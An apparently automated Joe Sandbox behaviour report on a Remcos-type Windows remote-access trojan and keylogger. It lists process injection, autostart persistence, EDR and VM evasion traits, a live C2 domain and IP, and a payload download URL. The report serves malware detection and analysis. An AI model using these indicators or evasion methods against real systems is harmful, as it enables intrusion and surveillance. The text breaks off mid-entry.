                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtEnumerateKey: Direct from: 0x7FF8C88ED644Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQueryInformationToken: Direct from: 0x7FF8C88ED424Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtUnmapViewOfSection: Direct from: 0x7FF8C88ED544Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQueryInformationProcess: Direct from: 0x7FF8C88ED324Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtOpenFile: Direct from: 0x7FF8C88ED664Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetSecurityObject: Direct from: 0x7FF8C88F04D4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetTimerEx: Direct from: 0x7FF8C88F05D4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtOpenKey: Direct from: 0x7FF8C88ED244Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtClose: Direct from: 0x7FF8C88ED1E4
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtCreateMutant: Direct from: 0x7FF8C88EE654Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQueryVolumeInformationFile: Direct from: 0x7FF8C88ED924Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtMapViewOfSection: Direct from: 0x7FF8C88ED504Jump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4E40000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeMemory written: C:\Users\user\AppData\Local\Temp\yjfesx.exe base: D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4E40000Jump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4AA4008Jump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413910 ImpersonateSelf,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,GetLastError,RevertToSelf,0_2_00413910
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A33000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program ManagerE
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A2B000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000002.3992301442.0000000009A33000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: yjfesx.exe, 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000002.3992636781.0000000009A3B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [2024/12/12 11:42:39 Program Manager]
                      Source: yjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program ManagerEM
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A2B000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000002.3992636781.0000000009A3B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [2024/12/12 11:42:27 Program Manager]
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A33000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program ManagerN
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A33000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Managerr|
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A33000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Manager)
                      Source: yjfesx.exe, 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager]
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A2B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program ManagerU
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A33000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Managernet/
                      Source: yjfesx.exe, 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerns|
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A1A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
                      Source: yjfesx.exe, 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /12/12 11:42:27 Program Manager]
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A33000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Managernet/$
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A1A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A2B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Manager>
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A2B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Managerz
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: GetLocaleInfoA,0_2_00432551
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: EnumSystemLocalesA,0_2_00430605
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: EnumSystemLocalesA,0_2_0043063C
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: EnumSystemLocalesA,0_2_004306C2
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,0_2_00430717
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_00422895
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformation
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_0042B2AC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0042B2AC
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_004135C0 GetVersionExA,GetVersionExA,GetVersionExA,0_2_004135C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      Source: Yara match, File source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: yjfesx.exe PID: 768, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match, File source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: yjfesx.exe PID: 768, type: MEMORYSTR

                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 131 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | 11 Input Capture | 1 System Time Discovery | Remote Services | 12 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                      Credentials | Domains | Default Accounts | 1 Native API | 11 Scheduled Task/Job | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | 11 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 11 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Abuse Elevation Control Mechanism | Security Account Manager | 137 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | 11 Scheduled Task/Job | Login Hook | 32 Process Injection | 2 Obfuscated Files or Information | NTDS | 231 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 11 Scheduled Task/Job | 3 Software Packing | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 11 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Cached Domain Credentials | 251 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                      IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 32 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                      Behavior Graph ID: 1573895, Sample: 3XSXmrEOw7.exe, Startdate: 12/12/2024, Architecture: WINDOWS, Score: 100
                      Top level, DNS/IP: newstaticfreepoint24.ddns-ip.net; s3-w.us-east-1.amazonaws.com; 5 other IPs or domains
                      Top level, signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
                      3XSXmrEOw7.exe (started): dropped C:\Users\user\Videos\...lectronArtsCLI.exe, PE32; signatures: Detected unpacking (creates a PE file in dynamic memory); Creates multiple autostart registry keys; Writes to foreign memory regions; Allocates memory in foreign processes; started csc.exe
                      csc.exe (started by 3XSXmrEOw7.exe): dropped C:\Users\user\AppData\Local\Temp\yjfesx.exe, PE32; signature: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      csc.exe, DNS/IP: newstaticfreepoint24.ddns-ip.net 181.131.217.244, 1842, 30203, 49729 EPMTelecomunicacionesSAESPCO Colombia; bitbucket.org 185.166.143.48, 443, 49736 AMAZON-02US Germany; s3-w.us-east-1.amazonaws.com 54.231.203.105, 443, 49743 AMAZON-02US United States
                      yjfesx.exe (started): dropped C:\Users\user\...\HardDiskSentinelBin.exe, PE32; signatures: Drops large PE files; Injects a PE file into a foreign processes; started yjfesx.exe
                      yjfesx.exe (started by yjfesx.exe): DNS/IP: geoplugin.net 178.237.33.50, 49836, 80 ATOM86-ASATOM86NL Netherlands; signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Installs a global keyboard hook; Found direct / indirect Syscall (likely to bypass EDR)

                      Source | Detection | Scanner | Label | Link
                      3XSXmrEOw7.exe | 29% | ReversingLabs | Win32.Ransomware.Generic |
                      3XSXmrEOw7.exe | 100% | Avira | TR/Crypt.XPACK.Gen3 |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      http://www.hdsentinel.com | 0% | Avira URL Cloud | safe |
                      http://go.microsoft.cC | 0% | Avira URL Cloud | safe |
                      https://bbuseruploads.s3.amazonaws | 0% | Avira URL Cloud | safe |
                      http://www.hdsentinel.comU | 0% | Avira URL Cloud | safe |
                      newstaticfreepoint24.ddns-ip.net | 0% | Avira URL Cloud | safe |
                      http://www.hdsentinel.com/sendreport.phpU | 0% | Avira URL Cloud | safe |

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      s3-w.us-east-1.amazonaws.com | 54.231.203.105 | true | false | | high
                      bitbucket.org | 185.166.143.48 | true | false | | high
                      navegacionseguracol24vip.org | 181.131.217.244 | true | false | | high
                      geoplugin.net | 178.237.33.50 | true | false | | high
                      newstaticfreepoint24.ddns-ip.net | 181.131.217.244 | true | true | | unknown
                      bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high

                      Name | Malicious | Antivirus Detection | Reputation
                      http://geoplugin.net/json.gp | false | | high
                      https://bitbucket.org/facturacioncol/fact/downloads/null.exe | false | | high
                      newstaticfreepoint24.ddns-ip.net | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
54.231.203.105 | s3-w.us-east-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
181.131.217.244 | navegacionseguracol24vip.org | Colombia | 13489 | EPMTelecomunicacionesSAESPCO | false
185.166.143.48 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1573895
Start date and time: 2024-12-12 17:40:15 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 3XSXmrEOw7.exe
renamed because original name is a hash value
Original Sample Name: 972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@6/5@5/4
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 66.7%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 79%
                                                                                                              • Number of executed functions: 185
                                                                                                              • Number of non-executed functions: 131
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target yjfesx.exe, PID 768 because there are no executed function
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • VT rate limit hit for: 3XSXmrEOw7.exe
Time | Type | Description
17:41:39 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLI C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exe
17:41:48 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLI C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exe
17:41:52 | Task Scheduler | Run new task: yjfesx path: C:\Users\user\AppData\Local\Temp\yjfesx.exe
17:42:26 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe
17:42:34 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe
                                                                                                                                sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                DOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                AMAZON-02USozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.166.143.48
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 54.231.193.17
                                                                                                                                hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.166.143.49
                                                                                                                                x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.48
                                                                                                                                ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.50
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.50
                                                                                                                                hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.49
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 18.238.49.124
                                                                                                                                file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                • 45.112.123.126
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\yjfesx.exe | ozfqy8Ms6t.exe | malicious | Remcos
C:\Users\user\AppData\Local\Temp\yjfesx.exe | pPLwX9wSrD.exe | malicious | Remcos
C:\Users\user\AppData\Local\Temp\yjfesx.exe | hCJ8gK9kNn.exe | malicious | Remcos
C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe | ozfqy8Ms6t.exe | malicious | Remcos
C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe | pPLwX9wSrD.exe | malicious | Remcos
C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe | hCJ8gK9kNn.exe | malicious | Remcos
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\yjfesx.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):488
                                                                                                                                            Entropy (8bit):3.269901406290736
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:6la4oecmla4NbWFe5UlaBlaJbWFe5UlaPjlaDlAbW+:6VlcmVRWqUeaWqUUE+W+
                                                                                                                                            MD5:6342EFFB59AA8777C7CC171F48D8F4A8
                                                                                                                                            SHA1:3D23F407F187EEF2CAC2F2B7FD0CB56DBD032469
                                                                                                                                            SHA-256:742880D5777E14D08B44A36BC7BEB9CBE9510275FEECAB57910B87549A177303
                                                                                                                                            SHA-512:A23CA39BE00E75A90DB6BE0F11644AAAF0474FA2FCC5DE6F80B93F6A87F71E9D0E69C2E038AEC3C1C964BEF393168745436FCD2D548CB67771822B92F9A2F641
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:....[.2.0.2.4./.1.2./.1.2. .1.1.:.4.2.:.1.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.2./.1.2. .1.1.:.4.2.:.1.5. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.2./.1.2. .1.1.:.4.2.:.2.6. .R.u.n.].........[.2.0.2.4./.1.2./.1.2. .1.1.:.4.2.:.2.7. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.2./.1.2. .1.1.:.4.2.:.3.5. .R.u.n.].........[.2.0.2.4./.1.2./.1.2. .1.1.:.4.2.:.3.9. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\yjfesx.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):963
                                                                                                                                            Entropy (8bit):5.0088110527764815
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzz:qlupdRNuKyGX85jvXhNlT3/7CcVKWrZ
                                                                                                                                            MD5:BD018C0C5F33B3037C1E9B852C5D9744
                                                                                                                                            SHA1:69225F65C7D5FF12EF0889811B9CB8CE1C1CF0D1
                                                                                                                                            SHA-256:29AE4457FFF6A1B0F04A9EC87B161876887D8E827EF06A443D61D78C6BA9330A
                                                                                                                                            SHA-512:BE6CF8CDC952A9DE6E1F0769934CFC5A07D93C2A2B341083D79D89CDEF6578D0DDF50D8079962DB3490D76A2738EB01678506C2C8B810BDBABFED567D1977BA3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":null,. "geoplugin_currencySymbol_UTF8":"",. "geoplugin_currencyConverter":0.}
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4054528
                                                                                                                                            Entropy (8bit):6.41931526899004
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:swsFCTOMRebywOIYAXu14+MFL3MrI+rtZg+VRWKldQwsRwRHa0eQkxHodWYPWIRL:Psukx/cRAVyoqjU9sVK+
                                                                                                                                            MD5:27650AFE28BA588C759ADE95BF403833
                                                                                                                                            SHA1:6D3D03096CEE42FC07300FB0946EC878161DF8A5
                                                                                                                                            SHA-256:CA84EC6D70351B003D3CACB9F81BE030CC9DE7AC267CCE718173D4F42CBA2966
                                                                                                                                            SHA-512:767CEB499DDA76E63F9ECEAA2AA2940D377E70A2F1B8E74DE72126977C96B32E151BFF1FB88A3199167E16977B641583F8E8EA0F764A35214F6BC9A2D2814FDC
                                                                                                                                            Malicious:true
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: ozfqy8Ms6t.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: pPLwX9wSrD.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: hCJ8gK9kNn.exe, Detection: malicious, Browse
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................. .........H. .......!...@...........................[..................@...........................p=.n5....?.p.....................................................=.....................................................CODE......!....... ................. ..`DATA..........!....... .............@...BSS...........!.......!..................idata...@...p=..6....!.............@....tls..........=.......!..................rdata... ....=.......!.............@..P.rsrc...p.....?.......!.............@..P........................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\yjfesx.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):979567142
                                                                                                                                            Entropy (8bit):0.05590638890163692
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:599A413EE85CC3A8A223C83230DC8D54
                                                                                                                                            SHA1:5D6E856794B3AF1D96AB0319350856BD5BCE4BE6
                                                                                                                                            SHA-256:CAAB3F404A2CE6D4EFCBFEC97172CBC17D2E4A8D128F4BB42BBE677947DBB425
                                                                                                                                            SHA-512:6EF58AC644BE1B60F2E65851CEF60E81D772212CB9B127613DDB77A941B555868AD3B616B173574D2129AC5F874650D485E520AE62287C939B5581C9E6D0CC32
                                                                                                                                            Malicious:false
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: ozfqy8Ms6t.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: pPLwX9wSrD.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: hCJ8gK9kNn.exe, Detection: malicious, Browse
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................. .........H. .......!...@...........................[..................@...........................p=.n5....?.p.....................................................=.....................................................CODE......!....... ................. ..`DATA..........!....... .............@...BSS...........!.......!..................idata...@...p=..6....!.............@....tls..........=.......!..................rdata... ....=.......!.............@..P.rsrc...p.....?.......!.............@..P........................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\3XSXmrEOw7.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):979567344
                                                                                                                                            Entropy (8bit):0.03700901017287011
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
